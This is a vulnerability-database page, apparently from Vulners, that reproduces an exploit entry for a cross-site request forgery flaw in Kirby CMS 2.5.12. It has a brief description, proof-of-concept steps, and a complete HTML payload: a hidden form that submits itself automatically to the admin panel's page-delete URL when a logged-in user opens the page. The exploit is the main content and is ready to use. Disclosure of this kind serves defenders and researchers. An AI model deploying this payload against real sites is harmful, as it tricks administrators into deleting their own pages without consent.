Lucene search

K

Kirby CMS 2.5.12 - Cross-Site Request Forgery (Delete Page)

๐Ÿ—“๏ธย 26 Jul 2018ย 00:00:00Reported byย Zaran ShaikhTypeย 
exploitpack
ย exploitpack
๐Ÿ‘ย 12ย Views

Kirby CMS 2.5.12 - Cross-Site Request Forgery allows malicious HTTP requests to trick users into adding or deleting web pages

Show more
Code
# Exploit Title:โ€‹โ€‹ Kirby CMS 2.5.12 - Cross-Site Request Forgery (Delete Page)
# Date: 2018-07-22
# Exploit Author: Zaran Shaikh
# Version: 2.5.12
# CVE: NA
# Category: Web Application

# 1. Description
# The application allows malicious HTTP requests to be sent in order to
# trick a user into adding/ deleting web pages.

# 2. Proof of Concept

1. Visit the application
2. Go to add page option
3. Create a crafted HTTP page with delete/ add option and host it on
a server. Upon sending the link to a user and upon click, it gets triggered
and the page is added/deleted
4. Payload:
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/kirby/panel/pages/csrf-test-page/delete">
      <input type="hidden" name="&#95;redirect" value="site&#47;subpages" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
26 Jul 2018 00:00Current
0.4Low risk
Vulners AI Score0.4
12
.json
Report